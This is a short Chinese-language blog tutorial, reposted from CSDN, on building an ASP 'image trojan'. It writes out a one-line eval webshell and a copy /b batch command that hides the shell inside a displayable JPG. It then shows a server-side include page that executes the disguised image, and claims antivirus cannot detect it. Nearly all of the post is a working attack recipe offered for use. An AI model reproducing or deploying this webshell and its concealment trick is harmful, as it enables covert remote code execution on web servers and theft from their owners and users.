滲透之——asp圖片木馬的製作和使用
轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/84959588
主要亮點:圖片木馬(可以正常開啟顯示的木馬)
先看程式碼:
僅需幾步:圖片和一句話木馬合併,製作可以正常顯示的圖片木馬。
1、找一張圖片,名字改成1.jpg
2、<%eval request(“a”)%>存為1.asp(就是一句話木馬)
3、copy 1.jpg /b + 1.asp /a asp.jpg 存為1.bat檔案
注:以上三個檔案放在同一目錄裡面
複製當前目錄下的1.jpg圖片和當前目錄下的1.asp檔案並以ASCII程式碼的方式合併為 asp.jpg圖片,執行1.bat,就會出現一個圖片asp.jpg,現在這個asp.jpg就是已經做好的木馬了。
這個圖片外表很正常,用縮圖也看不出任何破綻,但是卻非常的危險,讓人防不勝防。
利用方法:新建一個asp.asp 內容為:
<!–#include file=”asp.jpg”–>
把asp.jpg 和 asp.asp 放在同一目錄,然後訪問: asp.asp 用這種方法,任何防毒是搜不到的
相關文章
- 滲透測試-灰鴿子遠控木馬
- 圖片馬製作及利用方式
- 滲透測試之BurpSuite工具的使用介紹(三)UI
- pentestdb滲透工具使用
- asp:FileUpload 上次圖片
- 域滲透的金之鑰匙
- 網安之-=滲透思路
- 滲透測試之nmap
- 後滲透工具Koadic的使用介
- 滲透測試之域名收集
- 域滲透之ldap協議LDA協議
- 馬賽克圖片製作軟體:TurboMosaic啟用AI
- 實驗吧 —— web完整滲透測試實驗指導書(圖片版)Web
- 內網滲透-初探域滲透內網
- Burpsuite 滲透測試工具使用UI
- asp.net儲存圖片ASP.NET
- 從哲學角度看滲透之關於滲透與高智商電影
- 安全技術 | 域滲透之SPN
- 滲透測試之資訊收集
- 滲透&&探測 (之DNS協議)DNS協議
- 滲透之——資料庫提權資料庫
- 使用css製作滑鼠經過圖片時,放大圖片1.5倍CSS
- TurboMosaic for Mac 蒙太奇馬賽克圖片製作軟體AIMac
- 圖片馬的二次渲染
- 支援30+種型別幻燈片 | 輪播圖 | 旋轉木馬的強大jQuery外掛型別jQuery
- 萌新之php一句話木馬PHP
- 內網滲透應用 跨vlan滲透的一種思路內網
- wifi滲透WiFi
- 木馬學習
- 木牛流馬
- BetaBot 木馬分析
- 馬賽克圖片製作軟體TurboMosaic幫您保護自己的作品AI
- 域滲透之利用WMI來橫向滲透
- 透過 cavnas 旋轉圖片
- 電視劇的製作和發行
- 內網滲透 Metasploit(MSF)基礎使用內網
- Metasploit簡單使用——後滲透階段
- 內網滲透思路整理與工具使用內網